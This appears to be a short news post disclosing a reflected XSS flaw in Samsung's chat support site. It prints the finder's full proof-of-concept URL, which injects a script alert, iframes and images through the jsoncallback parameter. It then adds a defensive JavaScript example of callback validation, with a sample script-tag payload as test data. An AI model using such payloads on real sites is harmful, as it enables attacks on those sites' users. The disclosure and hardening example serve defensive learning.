XSS (Cross-Site Scripting) Vulnerability Found in Samsung.com

A hacker known as "Sony" found an XSS vulnerability in the Samsung website. According to his report, http://chat.support.samsung.com is vulnerable to an XSS attack.

Screenshot of Vulnerability:


POC:
http://chat.support.samsung.com/LiveChat/chkCIC?site_cd=AE&jsoncallback=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Cheers%20to%20a%20new%20year%20and%20another%20chance%20for%20us%20to%20get%20it%20right.%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/45wmyMgyZuY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_santa_claus/santa_claus_78.gif%20align=center%3E%3Cimg%20src=http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%20align=center%3E

The original post can be found here. A few months back, he found an XSS vulnerability in the Adobe Profile page.
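
The POC above carries HTML markup in the jsoncallback parameter. As an added example (not from the original post and not Samsung's code), here is one way a JSONP endpoint can validate that parameter before reflecting it. The handler shape, function names and sample queries are assumptions made for illustration.

```javascript
// Added example: hardening a JSONP endpoint against callback-parameter XSS.
// Handler shape and all names are assumptions, not the real endpoint's code.

// Allow only a dotted JavaScript identifier path of bounded length.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isSafeCallback(name) {
  return typeof name === "string" &&
    name.length > 0 && name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// Serialize data so it cannot close a <script> block or break JS parsing.
function safeJson(data) {
  return JSON.stringify(data)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Returns {status, headers, body} so any HTTP framework can send it.
function buildJsonpResponse(rawQuery, data) {
  const callback = new URLSearchParams(rawQuery).get("jsoncallback");
  const headers = {
    // Never serve JSONP as text/html; stop browsers from sniffing the type.
    "Content-Type": "application/javascript; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
  };
  if (!isSafeCallback(callback)) {
    // Reject with a fixed message; the supplied value is never echoed back.
    headers["Content-Type"] = "text/plain; charset=utf-8";
    return { status: 400, headers, body: "invalid callback" };
  }
  return { status: 200, headers, body: `${callback}(${safeJson(data)});` };
}

// Constructed sample queries: one benign, one carrying markup as in the POC.
const SAMPLE_OK = "site_cd=AE&jsoncallback=jQuery123_456";
const SAMPLE_BAD =
  "site_cd=AE&jsoncallback=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E";
for (const q of [SAMPLE_OK, SAMPLE_BAD]) {
  const r = buildJsonpResponse(q, { available: true });
  console.log(r.status, r.headers["Content-Type"], r.body);
}
```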
